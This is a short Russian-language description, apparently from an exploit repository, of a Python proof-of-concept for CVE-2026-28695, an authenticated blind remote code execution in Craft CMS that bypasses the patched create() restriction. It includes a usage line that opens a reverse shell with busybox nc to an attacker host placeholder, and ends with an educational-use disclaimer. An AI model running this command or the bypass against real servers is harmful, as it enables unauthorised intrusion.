
Python PoC-эксплойт для CVE-2026-28695 — аутентифицированного слепого RCE в Craft CMS, обходящего патч create() в BaseObject и запускающего обратную оболочку.
Аутентифицированное слепое удалённое выполнение кода в Craft CMS. Обходит ограничение create() — BaseObject, добавленное в исправлении CVE-2026-28695 (коммит e31e508).
python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'
Этот скрипт предназначен исключительно для образовательных целей. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим эксплойтом. Всегда убеждайтесь, что у вас есть разрешение перед тестированием или эксплуатацией уязвимостей!